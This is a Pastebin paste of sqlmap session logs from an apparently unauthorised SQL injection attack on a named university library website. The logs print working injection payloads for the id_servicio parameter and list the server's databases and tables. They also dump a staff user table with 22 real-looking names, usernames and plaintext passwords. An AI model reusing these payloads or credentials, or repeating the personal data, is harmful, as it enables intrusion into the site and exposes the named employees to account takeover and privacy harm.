Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql --dbs
- _
- ___ ___| |_____ ___ ___ {1.0.8.16#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 17:06:24
- [17:06:25] [INFO] testing connection to the target URL
- [17:06:28] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
- [17:06:29] [INFO] testing if the target URL is stable
- [17:06:30] [INFO] target URL is stable
- [17:06:30] [INFO] testing if GET parameter 'id_servicio' is dynamic
- [17:06:32] [INFO] confirming that GET parameter 'id_servicio' is dynamic
- [17:06:33] [INFO] GET parameter 'id_servicio' is dynamic
- [17:06:35] [INFO] heuristic (basic) test shows that GET parameter 'id_servicio' might be injectable (possible DBMS: 'MySQL')
- [17:06:36] [INFO] testing for SQL injection on GET parameter 'id_servicio'
- for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
- [17:08:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [17:08:10] [INFO] GET parameter 'id_servicio' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Haz")
- [17:08:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
- [17:08:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
- [17:08:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
- [17:08:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
- [17:08:17] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
- [17:08:18] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)'
- [17:08:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
- [17:08:22] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
- [17:08:24] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
- [17:08:25] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
- [17:08:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
- [17:08:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
- [17:08:30] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
- [17:08:32] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause (FLOOR)'
- [17:08:33] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
- [17:08:37] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
- [17:08:38] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
- [17:08:40] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
- [17:08:41] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
- [17:08:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
- [17:08:44] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
- [17:08:45] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
- [17:08:47] [INFO] testing 'MySQL inline queries'
- [17:08:48] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
- [17:08:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
- [17:08:51] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
- [17:08:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
- [17:08:54] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
- [17:08:55] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
- [17:08:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
- [17:09:10] [INFO] GET parameter 'id_servicio' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
- [17:09:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
- [17:09:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
- [17:09:14] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
- [17:09:23] [INFO] target URL appears to have 11 columns in query
- [17:09:49] [CRITICAL] unable to connect to the target URL ('Se ha forzado la interrupci¾n de una conexi¾n existente por el host remoto'). sqlmap is going to retry the request(s)
- [17:09:49] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
- [17:10:10] [INFO] GET parameter 'id_servicio' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
- GET parameter 'id_servicio' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
- sqlmap identified the following injection point(s) with a total of 69 HTTP(s) requests:
- ---
- Parameter: id_servicio (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_servicio=19 AND 1397=1397
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id_servicio=19 AND SLEEP(5)
- Type: UNION query
- Title: Generic UNION query (NULL) - 11 columns
- Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
- ---
- [17:13:23] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows
- web application technology: PHP 5.2.3, Apache 2.2.4
- back-end DBMS: MySQL >= 5.0.12
- [17:13:23] [INFO] fetching database names
- [17:13:25] [INFO] the SQL query used returns 28 entries
- [17:13:27] [INFO] retrieved: information_schema
- [17:13:29] [INFO] retrieved: adq
- [17:13:30] [INFO] retrieved: aleph
- [17:13:32] [INFO] retrieved: areas_biblioteca
- [17:13:34] [INFO] retrieved: biblioteca_digital
- [17:13:35] [INFO] retrieved: cosei
- [17:13:37] [INFO] retrieved: cuentasxxi
- [17:13:39] [INFO] retrieved: descarteah
- [17:13:41] [INFO] retrieved: empleados
- [17:13:42] [INFO] retrieved: inegi
- [17:13:44] [INFO] retrieved: jornadas
- [17:13:45] [INFO] retrieved: libreria
- [17:13:47] [INFO] retrieved: libreria_antes_actualizacion
- [17:13:48] [INFO] retrieved: multimedia_registro
- [17:13:49] [INFO] retrieved: mysql
- [17:13:51] [INFO] retrieved: oai-uamx
- [17:13:52] [INFO] retrieved: phpmyadmin
- [17:13:54] [INFO] retrieved: pib
- [17:13:55] [INFO] retrieved: planes_bibliografia
- [17:13:57] [INFO] retrieved: proctec
- [17:13:58] [INFO] retrieved: recursos_electronicos
- [17:14:00] [INFO] retrieved: resguardos
- [17:14:01] [INFO] retrieved: revistas_electronicas
- [17:14:05] [INFO] retrieved: salas
- [17:14:06] [INFO] retrieved: sscbs
- [17:14:08] [INFO] retrieved: tesis
- [17:14:09] [INFO] retrieved: tesis_pruebas
- [17:14:11] [INFO] retrieved: test
- available databases [28]:
- [*] adq
- [*] aleph
- [*] areas_biblioteca
- [*] biblioteca_digital
- [*] cosei
- [*] cuentasxxi
- [*] descarteah
- [*] empleados
- [*] inegi
- [*] information_schema
- [*] jornadas
- [*] libreria
- [*] libreria_antes_actualizacion
- [*] multimedia_registro
- [*] mysql
- [*] oai-uamx
- [*] phpmyadmin
- [*] pib
- [*] planes_bibliografia
- [*] proctec
- [*] recursos_electronicos
- [*] resguardos
- [*] revistas_electronicas
- [*] salas
- [*] sscbs
- [*] tesis
- [*] tesis_pruebas
- [*] test
- [17:14:11] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
- [*] shutting down at 17:14:11
- C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D adq --tables
- _
- ___ ___| |_____ ___ ___ {1.0.8.16#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 17:15:10
- [17:15:10] [INFO] testing connection to the target URL
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id_servicio (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_servicio=19 AND 1397=1397
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id_servicio=19 AND SLEEP(5)
- Type: UNION query
- Title: Generic UNION query (NULL) - 11 columns
- Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
- ---
- [17:15:12] [INFO] testing MySQL
- [17:15:14] [INFO] confirming MySQL
- [17:15:19] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows
- web application technology: PHP 5.2.3, Apache 2.2.4
- back-end DBMS: MySQL >= 5.0.0
- [17:15:19] [INFO] fetching tables for database: 'adq'
- [17:15:22] [INFO] the SQL query used returns 48 entries
- [17:15:24] [INFO] retrieved: carreras
- [17:15:25] [INFO] retrieved: cotizaciones
- [17:15:27] [INFO] retrieved: cotizaciones_copy
- [17:15:28] [INFO] retrieved: donaciones
- [17:15:30] [INFO] retrieved: editoriales
- [17:15:31] [INFO] retrieved: email
- [17:15:32] [INFO] retrieved: estados_desicion
- [17:15:34] [INFO] retrieved: estados_email
- [17:15:36] [INFO] retrieved: estados_libro
- [17:15:37] [INFO] retrieved: estados_libro_pedido
- [17:15:39] [INFO] retrieved: estados_pedido
- [17:15:40] [INFO] retrieved: estados_proceso_libro
- [17:15:42] [INFO] retrieved: estados_solicitudes
- [17:15:43] [INFO] retrieved: evaluacion_proveedores
- [17:15:44] [INFO] retrieved: facturas
- [17:15:46] [INFO] retrieved: libros
- [17:15:48] [INFO] retrieved: libros_copy
- [17:15:49] [INFO] retrieved: libros_en_bodega
- [17:15:50] [INFO] retrieved: libros_presolicitudes
- [17:15:52] [INFO] retrieved: libros_solicitados_de_la_web
- [17:15:53] [INFO] retrieved: libros_solicitud
- [17:15:55] [INFO] retrieved: libros_solicitud_copy
- [17:15:56] [INFO] retrieved: libros_solicitudes
- [17:15:57] [INFO] retrieved: libros_solicitudes_copy
- [17:15:59] [INFO] retrieved: libros_solicitudes_pedidos
- [17:16:00] [INFO] retrieved: libros_solicitudes_pedidos_copy
- [17:16:02] [INFO] retrieved: listas_libros
- [17:16:04] [INFO] retrieved: listas_libros_copy
- [17:16:05] [INFO] retrieved: pedidos
- [17:16:07] [INFO] retrieved: pedidos_copy
- [17:16:08] [INFO] retrieved: pedidos_periodicos
- [17:16:10] [INFO] retrieved: periodicos
- [17:16:11] [INFO] retrieved: periodicos_pedido
- [17:16:13] [INFO] retrieved: pre_solicitudes
- [17:16:14] [INFO] retrieved: presupuestos
- [17:16:16] [INFO] retrieved: proveedores
- [17:16:17] [INFO] retrieved: proveedores_1
- [17:16:19] [INFO] retrieved: proveedores_revistas_periodicos
- [17:16:21] [INFO] retrieved: prueba
- [17:16:22] [INFO] retrieved: relacion_libros_web_libros_adq
- [17:16:24] [INFO] retrieved: relacion_solicitud_cotizacion_pedido
- [17:16:26] [INFO] retrieved: revistas
- [17:16:28] [INFO] retrieved: revistas_pedido
- [17:16:30] [INFO] retrieved: solicitudes
- [17:16:31] [INFO] retrieved: solicitudes_copy
- [17:16:33] [INFO] retrieved: solicitudes_de_la_web
- [17:16:34] [INFO] retrieved: tipos_de_material
- [17:16:36] [INFO] retrieved: usuarios
- Database: adq
- [48 tables]
- +--------------------------------------+
- | carreras |
- | cotizaciones |
- | cotizaciones_copy |
- | donaciones |
- | editoriales |
- | email |
- | estados_desicion |
- | estados_email |
- | estados_libro |
- | estados_libro_pedido |
- | estados_pedido |
- | estados_proceso_libro |
- | estados_solicitudes |
- | evaluacion_proveedores |
- | facturas |
- | libros |
- | libros_copy |
- | libros_en_bodega |
- | libros_presolicitudes |
- | libros_solicitados_de_la_web |
- | libros_solicitud |
- | libros_solicitud_copy |
- | libros_solicitudes |
- | libros_solicitudes_copy |
- | libros_solicitudes_pedidos |
- | libros_solicitudes_pedidos_copy |
- | listas_libros |
- | listas_libros_copy |
- | pedidos |
- | pedidos_copy |
- | pedidos_periodicos |
- | periodicos |
- | periodicos_pedido |
- | pre_solicitudes |
- | presupuestos |
- | proveedores |
- | proveedores_1 |
- | proveedores_revistas_periodicos |
- | prueba |
- | relacion_libros_web_libros_adq |
- | relacion_solicitud_cotizacion_pedido |
- | revistas |
- | revistas_pedido |
- | solicitudes |
- | solicitudes_copy |
- | solicitudes_de_la_web |
- | tipos_de_material |
- | usuarios |
- +--------------------------------------+
- [17:16:36] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
- [*] shutting down at 17:16:36
- C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D adq -T usuarios --columns
- _
- ___ ___| |_____ ___ ___ {1.0.8.16#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 17:17:21
- [17:17:22] [INFO] testing connection to the target URL
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id_servicio (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_servicio=19 AND 1397=1397
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id_servicio=19 AND SLEEP(5)
- Type: UNION query
- Title: Generic UNION query (NULL) - 11 columns
- Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
- ---
- [17:17:24] [INFO] testing MySQL
- [17:17:24] [INFO] confirming MySQL
- [17:17:24] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows
- web application technology: PHP 5.2.3, Apache 2.2.4
- back-end DBMS: MySQL >= 5.0.0
- [17:17:24] [INFO] fetching columns for table 'usuarios' in database 'adq'
- [17:17:26] [INFO] the SQL query used returns 5 entries
- [17:17:28] [INFO] retrieved: "id_usuario","smallint(4) unsigned"
- [17:17:29] [INFO] retrieved: "tipo","smallint(4)"
- [17:17:31] [INFO] retrieved: "usuario","varchar(50)"
- [17:17:33] [INFO] retrieved: "passwd","varchar(128)"
- [17:17:35] [INFO] retrieved: "nombre","varchar(100)"
- Database: adq
- Table: usuarios
- [5 columns]
- +------------+----------------------+
- | Column | Type |
- +------------+----------------------+
- | id_usuario | smallint(4) unsigned |
- | nombre | varchar(100) |
- | passwd | varchar(128) |
- | tipo | smallint(4) |
- | usuario | varchar(50) |
- +------------+----------------------+
- [17:17:35] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
- [*] shutting down at 17:17:35
- C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D adq -T usuarios --columns --dump
- _
- ___ ___| |_____ ___ ___ {1.0.8.16#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 17:18:43
- [17:18:43] [INFO] testing connection to the target URL
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id_servicio (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_servicio=19 AND 1397=1397
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id_servicio=19 AND SLEEP(5)
- Type: UNION query
- Title: Generic UNION query (NULL) - 11 columns
- Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
- ---
- [17:18:46] [INFO] testing MySQL
- [17:18:46] [INFO] confirming MySQL
- [17:18:46] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows
- web application technology: PHP 5.2.3, Apache 2.2.4
- back-end DBMS: MySQL >= 5.0.0
- [17:18:46] [INFO] fetching columns for table 'usuarios' in database 'adq'
- [17:18:46] [INFO] the SQL query used returns 5 entries
- [17:18:46] [INFO] resumed: "id_usuario","smallint(4) unsigned"
- [17:18:46] [INFO] resumed: "tipo","smallint(4)"
- [17:18:46] [INFO] resumed: "usuario","varchar(50)"
- [17:18:46] [INFO] resumed: "passwd","varchar(128)"
- [17:18:46] [INFO] resumed: "nombre","varchar(100)"
- Database: adq
- Table: usuarios
- [5 columns]
- +------------+----------------------+
- | Column | Type |
- +------------+----------------------+
- | id_usuario | smallint(4) unsigned |
- | nombre | varchar(100) |
- | passwd | varchar(128) |
- | tipo | smallint(4) |
- | usuario | varchar(50) |
- +------------+----------------------+
- [17:18:46] [INFO] fetching columns for table 'usuarios' in database 'adq'
- [17:18:46] [INFO] the SQL query used returns 5 entries
- [17:18:46] [INFO] resumed: "id_usuario","smallint(4) unsigned"
- [17:18:46] [INFO] resumed: "tipo","smallint(4)"
- [17:18:46] [INFO] resumed: "usuario","varchar(50)"
- [17:18:46] [INFO] resumed: "passwd","varchar(128)"
- [17:18:46] [INFO] resumed: "nombre","varchar(100)"
- [17:18:46] [INFO] fetching entries for table 'usuarios' in database 'adq'
- [17:18:48] [INFO] the SQL query used returns 22 entries
- [17:18:49] [INFO] retrieved: "1","Administrador","ADMIN","1","ADMIN"
- [17:18:51] [INFO] retrieved: "2","Luis Maya Hernández","PROCESOS","1","LMAYAH"
- [17:18:52] [INFO] retrieved: "3","Adquisiciones","CONSULTA","1","CCAMACHO"
- [17:18:54] [INFO] retrieved: "4","Helia Terreros M.","COSEI","1","COSEI"
- [17:18:56] [INFO] retrieved: "5","Anabel","APOYO","3","ANABEL"
- [17:18:57] [INFO] retrieved: "6","Alejandra","PROCTEC","3","ALEJANDRA"
- [17:18:59] [INFO] retrieved: "7","Hortensia Galván M.","FACTURA","1","ADMINIS...
- [17:19:00] [INFO] retrieved: "8","I. Alfonsina Flores Ocampo","IGNALF131","2"...
- [17:19:02] [INFO] retrieved: "9","Leticia Peña Mata","LETIMA133","2","LETICIA"
- [17:19:04] [INFO] retrieved: "10","Ricardo Villafañez","RICVIL1","2","RICARDO"
- [17:19:05] [INFO] retrieved: "11","Rubén Velasco","RUVEL12","2","VELASCO"
- [17:19:07] [INFO] retrieved: "12","Prueba","prueba","3","prueba"
- [17:19:08] [INFO] retrieved: "13","Lorena Largo Pérez","BIBLIO12","1","LORENA"
- [17:19:10] [INFO] retrieved: "14","Julio Ibarra","INFODOC","1","JULIO"
- [17:19:11] [INFO] retrieved: "15","Oscar Solares","REVISION","2","SOLARES"
- [17:19:13] [INFO] retrieved: "16","Enrique Martínez Escalante","PROCESA","2",...
- [17:19:14] [INFO] retrieved: "17","Magdalena Monsalvo","MONSA74","3","MAGDALENA"
- [17:19:16] [INFO] retrieved: "18","Brenda Bonilla Cruz","ADQUI21","2","BRENDA"
- [17:19:17] [INFO] retrieved: "19","Mónica Paola Gorostieta Cornejo","GOROSCOR...
- [17:19:19] [INFO] retrieved: "20","Silvia Kirstenssen Wivrow Osorio ","WIVROW...
- [17:19:20] [INFO] retrieved: "21","Amelia Escandón Solís","AMELIA","2","ESCAN...
- [17:19:22] [INFO] retrieved: "22","Miguel Ángel Lara López","LARA","2","ANGEL"
- [17:19:22] [INFO] analyzing table dump for possible password hashes
- Database: adq
- Table: usuarios
- [22 entries]
- +------------+------+-----------+-----------------------------------+----------------+
- | id_usuario | tipo | passwd | nombre | usuario |
- +------------+------+-----------+-----------------------------------+----------------+
- | 1 | 1 | ADMIN | Administrador | ADMIN |
- | 2 | 1 | PROCESOS | Luis Maya Hernández | LMAYAH |
- | 3 | 1 | CONSULTA | Adquisiciones | CCAMACHO |
- | 4 | 1 | COSEI | Helia Terreros M. | COSEI |
- | 5 | 3 | APOYO | Anabel | ANABEL |
- | 6 | 3 | PROCTEC | Alejandra | ALEJANDRA |
- | 7 | 1 | FACTURA | Hortensia Galván M. | ADMINISTRATIVA |
- | 8 | 2 | IGNALF131 | I. Alfonsina Flores Ocampo | ALFONSINA |
- | 9 | 2 | LETIMA133 | Leticia Peña Mata | LETICIA |
- | 10 | 2 | RICVIL1 | Ricardo Villafañez | RICARDO |
- | 11 | 2 | RUVEL12 | Rubén Velasco | VELASCO |
- | 12 | 3 | prueba | Prueba | prueba |
- | 13 | 1 | BIBLIO12 | Lorena Largo Pérez | LORENA |
- | 14 | 1 | INFODOC | Julio Ibarra | JULIO |
- | 15 | 2 | REVISION | Oscar Solares | SOLARES |
- | 16 | 2 | PROCESA | Enrique Martínez Escalante | ENRIQUE |
- | 17 | 3 | MONSA74 | Magdalena Monsalvo | MAGDALENA |
- | 18 | 2 | ADQUI21 | Brenda Bonilla Cruz | BRENDA |
- | 19 | 1 | GOROSCOR | Mónica Paola Gorostieta Cornejo | MONICA |
- | 20 | 1 | WIVROW | Silvia Kirstenssen Wivrow Osorio | SILVIA |
- | 21 | 2 | AMELIA | Amelia Escandón Solís | ESCANDON |
- | 22 | 2 | LARA | Miguel Ángel Lara López | ANGEL |
- +------------+------+-----------+-----------------------------------+----------------+
- [17:19:22] [INFO] table 'adq.usuarios' dumped to CSV file 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx\dump\adq\usuarios.csv'
- [17:19:22] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
- [*] shutting down at 17:19:22
- C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql --dbs
- _
- ___ ___| |_____ ___ ___ {1.0.8.16#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 17:22:26
- [17:22:26] [INFO] testing connection to the target URL
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id_servicio (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_servicio=19 AND 1397=1397
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id_servicio=19 AND SLEEP(5)
- Type: UNION query
- Title: Generic UNION query (NULL) - 11 columns
- Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
- ---
- [17:22:28] [INFO] testing MySQL
- [17:22:28] [INFO] confirming MySQL
- [17:22:28] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows
- web application technology: PHP 5.2.3, Apache 2.2.4
- back-end DBMS: MySQL >= 5.0.0
- [17:22:28] [INFO] fetching database names
- [17:22:28] [INFO] the SQL query used returns 28 entries
- available databases [28]:
- [*] adq
- [*] aleph
- [*] areas_biblioteca
- [*] biblioteca_digital
- [*] cosei
- [*] cuentasxxi
- [*] descarteah
- [*] empleados
- [*] inegi
- [*] information_schema
- [*] jornadas
- [*] libreria
- [*] libreria_antes_actualizacion
- [*] multimedia_registro
- [*] mysql
- [*] oai-uamx
- [*] phpmyadmin
- [*] pib
- [*] planes_bibliografia
- [*] proctec
- [*] recursos_electronicos
- [*] resguardos
- [*] revistas_electronicas
- [*] salas
- [*] sscbs
- [*] tesis
- [*] tesis_pruebas
- [*] test
- [17:22:29] [INFO] fetched data logged to text files under 'C:\Users\whitejoker52\.sqlmap\output\biblioteca.xoc.uam.mx'
- [*] shutting down at 17:22:29
- C:\Users\whitejoker52\Desktop\hacking\sqlmap>sqlmap.py -u http://biblioteca.xoc.uam.mx/servicio.html?id_servicio=19 --dbms=mysql -D biblioteca_digital --tables
- _
- ___ ___| |_____ ___ ___ {1.0.8.16#dev}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 17:22:47
- [17:22:47] [INFO] testing connection to the target URL
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id_servicio (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_servicio=19 AND 1397=1397
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id_servicio=19 AND SLEEP(5)
- Type: UNION query
- Title: Generic UNION query (NULL) - 11 columns
- Payload: id_servicio=-2865 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627a71,0x6257576d614b736a796e6d73576c69476e56504161636268436f7170584a6e7674414b7363624254,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PYNR
- ---
- [17:22:49] [INFO] testing MySQL
- [17:22:49] [INFO] confirming MySQL
- [17:22:49] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows
- web application technology: PHP 5.2.3, Apache 2.2.4
- back-end DBMS: MySQL >= 5.0.0
- [17:22:49] [INFO] fetching tables for database: 'biblioteca_digital'
- [17:22:52] [INFO] the SQL query used returns 37 entries
- [17:22:54] [INFO] retrieved: articulos
- [17:22:56] [INFO] retrieved: articulos_autores
- [17:22:58] [INFO] retrieved: articulos_keywords
- [17:23:00] [INFO] retrieved: articulos_temas
- [17:23:02] [INFO] retrieved: autores
- [17:23:06] [INFO] retrieved: capitulos
- [17:23:07] [INFO] retrieved: capitulos_autores
- [17:23:09] [INFO] retrieved: coeditores
- [17:23:11] [INFO] retrieved: departamentos
- [17:23:12] [INFO] retrieved: dias
- [17:23:14] [INFO] retrieved: estadisticas
- [17:23:16] [INFO] retrieved: fasciculos
- [17:23:18] [INFO] retrieved: hosts
- [17:23:20] [INFO] retrieved: ipcountries
- [17:23:21] [INFO] retrieved: ipcountries_copy
- [17:23:23] [INFO] retrieved: keywords
- [17:23:25] [INFO] retrieved: libros
- [17:23:27] [INFO] retrieved: libros_autores
- [17:23:28] [INFO] retrieved: libros_coeditores
- [17:23:30] [INFO] retrieved: libros_copy1
- [17:23:32] [INFO] retrieved: libros_error00
- [17:23:34] [INFO] retrieved: libros_keywords
- [17:23:35] [INFO] retrieved: libros_original
- [17:23:37] [INFO] retrieved: libros_series
- [17:23:39] [INFO] retrieved: libros_subseries
- [17:23:40] [INFO] retrieved: libros_temas
- [17:23:42] [INFO] retrieved: lista_de_usuarios_bidi
- [17:23:44] [INFO] retrieved: lista_de_usuarios_revistas
- [17:23:45] [INFO] retrieved: revistas
- [17:23:47] [INFO] retrieved: revistas_copy
- [17:23:48] [INFO] retrieved: series
- [17:23:50] [INFO] retrieved: subseries
- [17:23:52] [INFO] retrieved: temas
- [17:23:53] [INFO] retrieved: temporal_libros
- [17:23:55] [INFO] retrieved: usuarios
- [17:23:57] [INFO] retrieved: usuarios_mig
- [17:23:58] [INFO] retrieved: visitas
- Database: biblioteca_digital
- [37 tables]
- +----------------------------+
- | articulos |
- | articulos_autores |
- | articulos_keywords |
- | articulos_temas |
- | autores |
- | capitulos |
- | capitulos_autores |
- | coeditores |
- | departamentos |
- | dias |
